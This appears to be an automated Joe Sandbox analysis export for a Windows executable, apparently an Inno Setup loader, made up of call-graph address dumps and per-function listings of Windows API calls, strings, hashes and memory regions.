IsDBCSLeadByte 6670->6671 6671->6669 6671->6670 6673 4068b7 6672->6673 6674 4068bb 6672->6674 6673->6468 6677 4068d0 CharPrevA 6674->6677 6676 4068cc 6676->6468 6677->6676 5680 407628 WriteFile 5681 407648 5680->5681 5682 40764f 5680->5682 5683 4073ec 21 API calls 5681->5683 5684 407660 5682->5684 5685 40734c 20 API calls 5682->5685 5683->5682 5685->5684 5981 403a28 ReadFile 5982 403a46 5981->5982 5983 403a49 GetLastError 5981->5983 6682 403932 6683 403924 6682->6683 6684 40374c VariantClear 6683->6684 6685 40392c 6684->6685 6686 408b34 6687 408b3b 6686->6687 6688 403198 4 API calls 6687->6688 6696 408bd5 6688->6696 6689 408c00 6690 4031b8 4 API calls 6689->6690 6691 408c8d 6690->6691 6692 408bec 6694 4032fc 4 API calls 6692->6694 6693 403278 4 API calls 6693->6696 6694->6689 6695 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6695->6696 6696->6689 6696->6692 6696->6693 6696->6695 5990 407ec0 5991 407ee8 5990->5991 5993 407eef 5990->5993 5992 407dfc 21 API calls 5991->5992 5992->5993 5994 407f16 5993->5994 5995 407f18 5993->5995 5997 407f22 5993->5997 6000 4050e4 19 API calls 5994->6000 5998 407d14 19 API calls 5995->5998 5996 407f57 6001 403198 4 API calls 5996->6001 5997->5996 5999 407d14 19 API calls 5997->5999 5998->5997 5999->5996 6002 407f3e 6000->6002 6003 407f6c 6001->6003 6005 407c9c 6002->6005 6006 407c9f 6005->6006 6007 40322c 4 API calls 6006->6007 6008 407cc1 6007->6008 6009 4032fc 4 API calls 6008->6009 6010 407ccb 6009->6010 6011 4057e0 4 API calls 6010->6011 6012 407cda 6011->6012 6013 403198 4 API calls 6012->6013 6014 407cf4 6013->6014 6014->5997 5870 4075cc SetFilePointer 5871 407603 5870->5871 5872 4075f3 GetLastError 5870->5872 5872->5871 5873 4075fc 5872->5873 5874 4073ec 21 API calls 5873->5874 5874->5871 6019 402ccc 6022 402cfe 6019->6022 6023 402cdd 6019->6023 6020 402d88 RtlUnwind 6021 403154 4 API calls 6020->6021 6021->6022 6023->6020 6023->6022 6024 402b28 RaiseException 6023->6024 6025 402d7f 6024->6025 6025->6020 6705 403fcd 6706 403f07 4 API calls 6705->6706 6707 403fd6 6706->6707 6708 403e9c 4 API calls 6707->6708 6709 403fe2 6708->6709 4916 4024d0 4917 4024e4 4916->4917 4918 4024f7 4916->4918 4955 401918 RtlInitializeCriticalSection 4917->4955 4919 402518 4918->4919 4920 40250e RtlEnterCriticalSection 4918->4920 4932 402300 4919->4932 4920->4919 4924 4024ed 4926 402525 4928 402581 4926->4928 4929 402577 RtlLeaveCriticalSection 4926->4929 4929->4928 4930 402531 4930->4926 4962 40215c 4930->4962 4933 402314 4932->4933 4936 402335 4933->4936 4937 4023b8 4933->4937 4934 402344 4934->4926 4942 401fd4 4934->4942 4936->4934 4976 401b74 4936->4976 4937->4934 4940 402455 4937->4940 4979 401d80 4937->4979 4987 401e84 4937->4987 4940->4934 4983 401d00 4940->4983 4943 401fe8 4942->4943 4944 401ffb 4942->4944 4945 401918 4 API calls 4943->4945 4946 402012 RtlEnterCriticalSection 4944->4946 4949 40201c 4944->4949 4947 401fed 4945->4947 4946->4949 4947->4944 4948 401ff1 4947->4948 4954 402052 4948->4954 4949->4954 5069 401ee0 4949->5069 4952 402147 4952->4930 4953 40213d RtlLeaveCriticalSection 4953->4952 4954->4930 4956 40193c RtlEnterCriticalSection 4955->4956 4957 401946 4955->4957 4956->4957 4958 401964 LocalAlloc 4957->4958 4959 40197e 4958->4959 4960 4019c3 RtlLeaveCriticalSection 4959->4960 4961 4019cd 4959->4961 4960->4961 4961->4918 4961->4924 4963 40217a 4962->4963 4964 402175 4962->4964 4966 4021b5 4963->4966 4967 4021ab RtlEnterCriticalSection 4963->4967 4968 40217e 4963->4968 4965 401918 4 API calls 4964->4965 4965->4963 4969 402244 4966->4969 4972 4021c1 4966->4972 4974 402270 4966->4974 4967->4966 4968->4926 4969->4968 4973 401d80 7 API calls 4969->4973 4970 4022e3 RtlLeaveCriticalSection 4971 4022ed 4970->4971 4971->4926 4972->4970 4972->4971 4973->4968 4974->4972 4975 401d00 7 API calls 4974->4975 4975->4972 4977 40215c 9 API calls 4976->4977 4978 401b95 4977->4978 4978->4934 4980 401d92 4979->4980 4981 401d89 4979->4981 4980->4937 4981->4980 4982 401b74 9 API calls 4981->4982 4982->4980 4984 401d4e 4983->4984 4985 401d1e 4983->4985 4984->4985 4992 401c68 4984->4992 4985->4934 5047 401768 4987->5047 4989 401e99 4991 401ea6 4989->4991 5058 401dcc 4989->5058 4991->4937 4993 401c7a 4992->4993 4994 401c9d 4993->4994 4995 401caf 4993->4995 5005 40188c 4994->5005 4997 40188c 3 API calls 4995->4997 4998 401cad 4997->4998 4999 401cc5 4998->4999 5015 401b44 4998->5015 4999->4985 5001 401cd4 5002 401cee 5001->5002 5020 401b98 5001->5020 5025 4013a0 5002->5025 5006 4018b2 5005->5006 5007 40190b 5005->5007 5029 401658 5006->5029 5007->4998 5012 4018e6 5012->5007 5014 4013a0 LocalAlloc 5012->5014 5014->5007 5016 401b61 5015->5016 5017 401b52 5015->5017 5016->5001 5018 401d00 9 API calls 5017->5018 5019 401b5f 5018->5019 5019->5001 5021 401bab 5020->5021 5022 401b9d 5020->5022 5021->5002 5023 401b74 9 API calls 5022->5023 5024 401baa 5023->5024 5024->5002 5026 4013ab 5025->5026 5027 4012e4 LocalAlloc 5026->5027 5028 4013c6 5026->5028 5027->5028 5028->4999 5032 40168f 5029->5032 5030 4016cf 5033 40132c 5030->5033 5031 4016a9 VirtualFree 5031->5032 5032->5030 5032->5031 5034 401348 5033->5034 5041 4012e4 5034->5041 5037 40150c 5039 40153b 5037->5039 5038 401594 5038->5012 5039->5038 5040 401568 VirtualFree 5039->5040 5040->5039 5044 40128c 5041->5044 5045 401298 LocalAlloc 5044->5045 5046 4012aa 5044->5046 5045->5046 5046->5012 5046->5037 5048 401787 5047->5048 5049 40183b 5048->5049 5050 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5048->5050 5051 40132c LocalAlloc 5048->5051 5053 401821 5048->5053 5055 4017d6 5048->5055 5056 4017e7 5049->5056 5065 4015c4 5049->5065 5050->5048 5051->5048 5054 40150c VirtualFree 5053->5054 5054->5056 5057 40150c VirtualFree 5055->5057 5056->4989 5057->5056 5059 401d80 9 API calls 5058->5059 5060 401de0 5059->5060 5061 40132c LocalAlloc 5060->5061 5062 401df0 5061->5062 5063 401df8 5062->5063 5064 401b44 9 API calls 5062->5064 5063->4991 5064->5063 5067 40160a 5065->5067 5066 40163a 5066->5056 5067->5066 5068 401626 VirtualAlloc 5067->5068 5068->5066 5068->5067 5072 401ef0 5069->5072 5070 401f1c 5071 401d00 9 API calls 5070->5071 5074 401f40 5070->5074 5071->5074 5072->5070 5072->5074 5075 401e58 5072->5075 5074->4952 5074->4953 5080 4016d8 5075->5080 5078 401e75 5078->5072 5079 401dcc 9 API calls 5079->5078 5081 4016f4 5080->5081 5082 4016fe 5081->5082 5085 40132c LocalAlloc 5081->5085 5087 40174f 5081->5087 5089 40175b 5081->5089 5090 401430 5081->5090 5084 4015c4 VirtualAlloc 5082->5084 5086 40170a 5084->5086 5085->5081 5086->5089 5088 40150c VirtualFree 5087->5088 5088->5089 5089->5078 5089->5079 5091 40143f VirtualAlloc 5090->5091 5093 40146c 5091->5093 5094 40148f 5091->5094 5095 4012e4 LocalAlloc 5093->5095 5094->5081 5096 401478 5095->5096 5096->5094 5097 40147c VirtualFree 5096->5097 5097->5094 6030 4028d2 6031 4028da 6030->6031 6032 403554 4 API calls 6031->6032 6033 4028ef 6031->6033 6032->6031 6034 4025ac 4 API calls 6033->6034 6035 4028f4 6034->6035 6710 4019d3 6711 4019ba 6710->6711 6712 4019c3 RtlLeaveCriticalSection 6711->6712 6713 4019cd 6711->6713 6712->6713 5689 409fd8 5720 409460 GetLastError 5689->5720 5692 402f24 5 API calls 5693 409fe4 5692->5693 5694 409fee CreateWindowExA SetWindowLongA 5693->5694 5695 4050e4 19 API calls 5694->5695 5696 40a071 5695->5696 5733 4032fc 5696->5733 5698 40a07f 5699 4032fc 4 API calls 5698->5699 5700 40a08c 5699->5700 5747 406adc GetCommandLineA 5700->5747 5703 4032fc 4 API calls 5704 40a0a1 5703->5704 5752 409888 5704->5752 5708 40a0c6 5709 40a0e6 5708->5709 5710 40a0ff 5708->5710 5774 4093fc 5709->5774 5712 40a118 5710->5712 5715 40a112 RemoveDirectoryA 5710->5715 5713 40a121 73A25CF0 5712->5713 5714 40a12c 5712->5714 5713->5714 5716 40a154 5714->5716 5782 40357c 5714->5782 5715->5712 5718 40a14a 5719 4025ac 4 API calls 5718->5719 5719->5716 5795 404be4 5720->5795 5723 4071e4 5 API calls 5724 4094b7 5723->5724 5798 408ccc 5724->5798 5727 4057e0 4 API calls 5728 4094db 5727->5728 5729 4031b8 4 API calls 5728->5729 5730 4094fa 5729->5730 5731 403198 4 API calls 5730->5731 5732 409502 5731->5732 5732->5692 5734 403300 5733->5734 5735 40333f 5733->5735 5736 4031e8 5734->5736 5737 40330a 5734->5737 5735->5698 5740 4031fc 5736->5740 5744 403254 4 API calls 5736->5744 5738 403334 5737->5738 5739 40331d 5737->5739 5743 4034f0 4 API calls 5738->5743 5741 4034f0 4 API calls 5739->5741 5742 403228 5740->5742 5745 4025ac 4 API calls 5740->5745 5746 403322 5741->5746 5742->5698 5743->5746 5744->5740 5745->5742 5746->5698 5748 406a50 4 API calls 5747->5748 5749 406b01 5748->5749 5750 403198 4 API calls 5749->5750 5751 406b1f 5750->5751 5751->5703 5753 4033b4 4 API calls 5752->5753 5754 4098c3 5753->5754 5755 4098f5 CreateProcessA 5754->5755 5756 409901 5755->5756 5757 409908 CloseHandle 5755->5757 5758 409460 21 API calls 5756->5758 5759 409911 5757->5759 5758->5757 5812 40985c 5759->5812 5762 40992d 5763 40985c 3 API calls 5762->5763 5764 409932 GetExitCodeProcess CloseHandle 5763->5764 5765 409952 5764->5765 5766 403198 4 API calls 5765->5766 5767 40995a 5766->5767 5767->5708 5768 40969c 5767->5768 5769 4096a4 5768->5769 5773 4096de 5768->5773 5770 403420 4 API calls 5769->5770 5769->5773 5771 4096d8 5770->5771 5816 408da4 5771->5816 5773->5708 5775 409456 5774->5775 5777 40940f 5774->5777 5775->5710 5776 409417 Sleep 5776->5777 5777->5775 5777->5776 5778 409427 Sleep 5777->5778 5780 40943e GetLastError 5777->5780 5832 408ee0 5777->5832 5778->5777 5780->5775 5781 409448 GetLastError 5780->5781 5781->5775 5781->5777 5783 403591 5782->5783 5784 4035a0 5782->5784 5787 4035b6 5783->5787 5790 40359b 5783->5790 5793 4035d0 5783->5793 5785 4035b1 5784->5785 5786 4035b8 5784->5786 5788 403198 4 API calls 5785->5788 5789 4031b8 4 API calls 5786->5789 5787->5718 5788->5787 5789->5787 5790->5784 5794 4035ec 5790->5794 5791 40357c 4 API calls 5791->5793 5793->5787 5793->5791 5794->5787 5849 403554 5794->5849 5796 4050f8 19 API calls 5795->5796 5797 404c02 5796->5797 5797->5723 5799 408cec 5798->5799 5802 408ba4 5799->5802 5803 403198 4 API calls 5802->5803 5811 408bd5 5802->5811 5803->5811 5804 408c00 5805 4031b8 4 API calls 5804->5805 5806 408c8d 5805->5806 5806->5727 5807 408bec 5809 4032fc 4 API calls 5807->5809 5808 403278 4 API calls 5808->5811 5809->5804 5810 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5810->5811 5811->5804 5811->5807 5811->5808 5811->5810 5813 409870 PeekMessageA 5812->5813 5814 409882 MsgWaitForMultipleObjects 5813->5814 5815 409864 TranslateMessage DispatchMessageA 5813->5815 5814->5759 5814->5762 5815->5813 5817 408db2 5816->5817 5819 408dca 5817->5819 5829 408d3c 5817->5829 5820 408d3c 4 API calls 5819->5820 5821 408dee 5819->5821 5820->5821 5822 407878 InterlockedExchange 5821->5822 5823 408e09 5822->5823 5824 408d3c 4 API calls 5823->5824 5826 408e1c 5823->5826 5824->5826 5825 408d3c 4 API calls 5825->5826 5826->5825 5827 403278 4 API calls 5826->5827 5828 408e4b 5826->5828 5827->5826 5828->5773 5830 4057e0 4 API calls 5829->5830 5831 408d4d 5830->5831 5831->5819 5840 408e94 5832->5840 5834 408ef6 5835 408efa 5834->5835 5836 408f16 DeleteFileA GetLastError 5834->5836 5835->5777 5837 408f34 5836->5837 5846 408ed0 5837->5846 5841 408ea2 5840->5841 5842 408e9e 5840->5842 5843 408ec4 SetLastError 5841->5843 5844 408eab Wow64DisableWow64FsRedirection 5841->5844 5842->5834 5845 408ebf 5843->5845 5844->5845 5845->5834 5847 408ed5 Wow64RevertWow64FsRedirection 5846->5847 5848 408edf 5846->5848 5847->5848 5848->5777 5850 403566 5849->5850 5852 403578 5850->5852 5853 403604 5850->5853 5852->5794 5854 40357c 5853->5854 5855 4035a0 5854->5855 5860 4035d0 5854->5860 5861 40359b 5854->5861 5862 4035b6 5854->5862 5856 4035b1 5855->5856 5857 4035b8 5855->5857 5858 403198 4 API calls 5856->5858 5859 4031b8 4 API calls 5857->5859 5858->5862 5859->5862 5860->5862 5864 40357c 4 API calls 5860->5864 5861->5855 5863 4035ec 5861->5863 5862->5850 5863->5862 5865 403554 4 API calls 5863->5865 5864->5860 5865->5863 6717 4065dc IsDBCSLeadByte 6718 4065f4 6717->6718 6729 402be9 RaiseException 6730 402c04 6729->6730 6040 409ef0 6041 409f15 6040->6041 6042 407878 InterlockedExchange 6041->6042 6043 409f3f 6042->6043 6044 409f4f 6043->6044 6045 409984 4 API calls 6043->6045 6050 40760c SetEndOfFile 6044->6050 6045->6044 6047 409f6b 6048 4025ac 4 API calls 6047->6048 6049 409fa2 6048->6049 6051 407623 6050->6051 6052 40761c 6050->6052 6051->6047 6053 4073ec 21 API calls 6052->6053 6053->6051 6054 402af2 6055 402afe 6054->6055 6058 402ed0 6055->6058 6059 403154 4 API calls 6058->6059 6061 402ee0 6059->6061 6060 402b03 6061->6060 6063 402b0c 6061->6063 6064 402b25 6063->6064 6065 402b15 RaiseException 6063->6065 6064->6060 6065->6064 6066 405af2 6067 405af4 6066->6067 6068 405b30 6067->6068 6069 405b47 6067->6069 6070 405b2a 6067->6070 6071 405890 5 API calls 6068->6071 6075 404c2c 5 API calls 6069->6075 6070->6068 6073 405b9c 6070->6073 6072 405b43 6071->6072 6076 403198 4 API calls 6072->6076 6074 405900 19 API calls 6073->6074 6074->6072 6077 405b70 6075->6077 6078 405bd6 6076->6078 6079 405900 19 API calls 6077->6079 6079->6072 6731 402dfa 6732 402e26 6731->6732 6733 402e0d 6731->6733 6735 402ba4 6733->6735 6736 402bc9 6735->6736 6737 402bad 6735->6737 6736->6732 6738 402bb5 RaiseException 6737->6738 6738->6736 6739 4097fc 6740 40980b 6739->6740 6741 409815 6739->6741 6740->6741 6742 40983a CallWindowProcA 6740->6742 6742->6741 6102 403a80 CloseHandle 6103 403a90 6102->6103 6104 403a91 GetLastError 6102->6104 6105 404283 6106 4042c3 6105->6106 6107 403154 4 API calls 6106->6107 6108 404323 6107->6108 6747 404185 6748 4041ff 6747->6748 6749 4041cc 6748->6749 6750 403154 4 API calls 6748->6750 6751 404323 6750->6751 6109 403e87 6110 403e4c 6109->6110 6111 403e62 6110->6111 6112 403e7b 6110->6112 6115 403e67 6110->6115 6118 403cc8 6111->6118 6113 402674 4 API calls 6112->6113 6116 403e78 6113->6116 6115->6116 6122 402674 6115->6122 6119 403cd6 6118->6119 6120 403ceb 6119->6120 6121 402674 4 API calls 6119->6121 6120->6115 6121->6120 6123 403154 4 API calls 6122->6123 6124 40267a 6123->6124 6124->6116 5875 40758c ReadFile 5876 4075c3 5875->5876 5877 4075ac 5875->5877 5878 4075b2 GetLastError 5877->5878 5879 4075bc 5877->5879 5878->5876 5878->5879 5880 4073ec 21 API calls 5879->5880 5880->5876 6125 40708e 6126 407078 6125->6126 6127 403198 4 API calls 6126->6127 6128 407080 6127->6128 6129 403198 4 API calls 6128->6129 6130 407088 6129->6130 6135 403e95 6136 403e4c 6135->6136 6137 403e62 6136->6137 6138 403e7b 6136->6138 6141 403e67 6136->6141 6140 403cc8 4 API calls 6137->6140 6139 402674 4 API calls 6138->6139 6142 403e78 6139->6142 6140->6141 6141->6142 6143 402674 4 API calls 6141->6143 6143->6142 6144 403a97 6145 403aac 6144->6145 6146 403bbc GetStdHandle 6145->6146 6147 403b0e CreateFileA 6145->6147 6157 403ab2 6145->6157 6148 403c17 GetLastError 6146->6148 6152 403bba 6146->6152 6147->6148 6149 403b2c 6147->6149 6148->6157 6151 403b3b GetFileSize 6149->6151 6149->6152 6151->6148 6153 403b4e SetFilePointer 6151->6153 6154 403be7 GetFileType 6152->6154 6152->6157 6153->6148 6158 403b6a ReadFile 6153->6158 6156 403c02 CloseHandle 6154->6156 6154->6157 6156->6157 6158->6148 6159 403b8c 6158->6159 6159->6152 6160 403b9f SetFilePointer 6159->6160 6160->6148 6161 403bb0 SetEndOfFile 6160->6161 6161->6148 6161->6152 5686 4074a8 5687 4074b4 CloseHandle 5686->5687 5688 4074bd 5686->5688 5687->5688 6764 40a1a9 6773 409514 6764->6773 6767 402f24 5 API calls 6768 40a1b3 6767->6768 6769 403198 4 API calls 6768->6769 6770 40a1d2 6769->6770 6771 403198 4 API calls 6770->6771 6772 40a1da 6771->6772 6782 4055fc 6773->6782 6775 40955d 6779 403198 4 API calls 6775->6779 6776 40952f 6776->6775 6788 40716c 6776->6788 6778 40954d 6781 409555 MessageBoxA 6778->6781 6780 409572 6779->6780 6780->6767 6780->6768 6781->6775 6783 403154 4 API calls 6782->6783 6784 405601 6783->6784 6785 405619 6784->6785 6786 403154 4 API calls 6784->6786 6785->6776 6787 40560f 6786->6787 6787->6776 6789 4055fc 4 API calls 6788->6789 6790 40717b 6789->6790 6791 407181 6790->6791 6792 40718f 6790->6792 6793 40322c 4 API calls 6791->6793 6795 4071ab 6792->6795 6796 40719f 6792->6796 6794 40718d 6793->6794 6794->6778 6806 4032b8 6795->6806 6799 407130 6796->6799 6800 40322c 4 API calls 6799->6800 6801 40713f 6800->6801 6802 40715c 6801->6802 6803 4068b0 CharPrevA 6801->6803 6802->6794 6804 40714b 6803->6804 6804->6802 6805 4032fc 4 API calls 6804->6805 6805->6802 6807 403278 4 API calls 6806->6807 6808 4032c2 6807->6808 6808->6794 6809 4011aa 6810 4011ac GetStdHandle 6809->6810 6169 4028ac 6170 402594 4 API calls 6169->6170 6171 4028b6 6170->6171 6176 4050b0 6177 4050c3 6176->6177 6178 404da8 19 API calls 6177->6178 6179 4050d7 6178->6179 6819 409fb4 6820 409fe4 6819->6820 6821 409fee CreateWindowExA SetWindowLongA 6820->6821 6822 4050e4 19 API calls 6821->6822 6823 40a071 6822->6823 6824 4032fc 4 API calls 6823->6824 6825 40a07f 6824->6825 6826 4032fc 4 API calls 6825->6826 6827 40a08c 6826->6827 6828 406adc 5 API calls 6827->6828 6829 40a098 6828->6829 6830 4032fc 4 API calls 6829->6830 6831 40a0a1 6830->6831 6832 409888 29 API calls 6831->6832 6833 40a0b3 6832->6833 6834 40969c 5 API calls 6833->6834 6835 40a0c6 6833->6835 6834->6835 6836 40a0ff 6835->6836 6837 4093fc 9 API calls 6835->6837 6838 40a118 6836->6838 6841 40a112 RemoveDirectoryA 6836->6841 6837->6836 6839 40a121 73A25CF0 6838->6839 6840 40a12c 6838->6840 6839->6840 6842 40a154 6840->6842 6843 40357c 4 API calls 6840->6843 6841->6838 6844 40a14a 6843->6844 6845 4025ac 4 API calls 6844->6845 6845->6842 6180 401ab9 6181 401a96 6180->6181 6182 401aa9 RtlDeleteCriticalSection 6181->6182 6183 401a9f RtlLeaveCriticalSection 6181->6183 6183->6182

                                                                          Executed Functions

                                                                          Function 00409A14 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 108 409a14-409a38 GetSystemInfo VirtualQuery 109 409ac8-409acf 108->109 110 409a3e 108->110 111 409abd-409ac2 110->111 111->109 112 409a40-409a47 111->112 113 409aa9-409abb VirtualQuery 112->113 114 409a49-409a4d 112->114 113->109 113->111 114->113 115 409a4f-409a57 114->115 116 409a68-409a79 VirtualProtect 115->116 117 409a59-409a5c 115->117 119 409a7b 116->119 120 409a7d-409a7f 116->120 117->116 118 409a5e-409a61 117->118 118->116 121 409a63-409a66 118->121 119->120 122 409a8e-409a91 120->122 121->116 121->120 123 409a81-409a8a call 409a0c 122->123 124 409a93-409a95 122->124 123->122 124->113 126 409a97-409aa4 VirtualProtect 124->126 126->113
                                                                          APIs
                                                                          • GetSystemInfo.KERNEL32(?), ref: 00409A26
                                                                          • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409A31
                                                                          • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409A72
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409AA4
                                                                          • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409AB4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$ProtectQuery$InfoSystem
                                                                          • String ID:
                                                                          • API String ID: 2441996862-0
                                                                          • Opcode ID: c2769086b94dacb7810d1409196c7497058a42c32b70979fc979e51038c0ff67
                                                                          • Instruction ID: 05782b2e5a8588c9c74d05110837466633af9a4b7a19298b20ab433fd050a55e
                                                                          • Opcode Fuzzy Hash: c2769086b94dacb7810d1409196c7497058a42c32b70979fc979e51038c0ff67
                                                                          • Instruction Fuzzy Hash: D0216FB13003846BD6309A698C85E67B7DC9F85360F18492AFA85E62C3D73DED40CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040515C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: 8ef9b48ed96d6a8df8db933101511442404bdd0abec70889978d036278c5d13e
                                                                          • Instruction ID: b78bf48cff894a3999656c5243e329942f020ab22272e2e872fdbeeaebf0035e
                                                                          • Opcode Fuzzy Hash: 8ef9b48ed96d6a8df8db933101511442404bdd0abec70889978d036278c5d13e
                                                                          • Instruction Fuzzy Hash: EDE09271B0021426D711A9699C86AEB735DDB58310F0006BFB904EB3C6EDB49E8046ED
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00408FC8 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00409061,?,?,?,?,00000000,?,00409B53), ref: 00408FE8
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408FEE
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061,?,?,?,?,00000000,?,00409B53), ref: 00409002
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00409008
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                          • API String ID: 1646373207-2130885113
                                                                          • Opcode ID: 17e7db4c528402608d9f53e260f8b79ce616995abb8d95c1af2dd02ed3ed6c5c
                                                                          • Instruction ID: 9fcc65c531327f2d7efb14c601a25e4e420c6304718e48176e9e04a6a3b299d5
                                                                          • Opcode Fuzzy Hash: 17e7db4c528402608d9f53e260f8b79ce616995abb8d95c1af2dd02ed3ed6c5c
                                                                          • Instruction Fuzzy Hash: 6701DF70208300AEEB10AB76DC47B563AA8E782714F60843BF504B22C3CA7C5C44CA2E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409FB4 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
                                                                          • SetWindowLongA.USER32(00020420,000000FC,004097FC), ref: 0040A027
                                                                            • Part of subcall function 00406ADC: GetCommandLineA.KERNEL32(00000000,00406B20,?,?,?,?,00000000,?,0040A098,?), ref: 00406AF4
                                                                            • Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974,00000000,0040995B), ref: 004098F8
                                                                            • Part of subcall function 00409888: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974,00000000), ref: 0040990C
                                                                            • Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
                                                                            • Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
                                                                            • Part of subcall function 00409888: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974), ref: 00409940
                                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A113
                                                                          • 73A25CF0.USER32(00020420,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A127
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                          • API String ID: 978128352-3001827809
                                                                          • Opcode ID: f35d8c1ce23740e5e47570a4a7ea1aa6b0c7a4e1336b706dbfad7c34b6de0a74
                                                                          • Instruction ID: 994b03bd5abc72cbe06dd2c14f0861f5fc0fad0f3ad24bd21fe84be6bde737e4
                                                                          • Opcode Fuzzy Hash: f35d8c1ce23740e5e47570a4a7ea1aa6b0c7a4e1336b706dbfad7c34b6de0a74
                                                                          • Instruction Fuzzy Hash: 57411A70A00205DFD715EBA9EE86B9A7BA5EB84304F10427BF510B73E2DB789801DB5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409FD8 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 102COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00409460: GetLastError.KERNEL32(00000000,00409503,?,0040B240,?,02072BFC), ref: 00409484
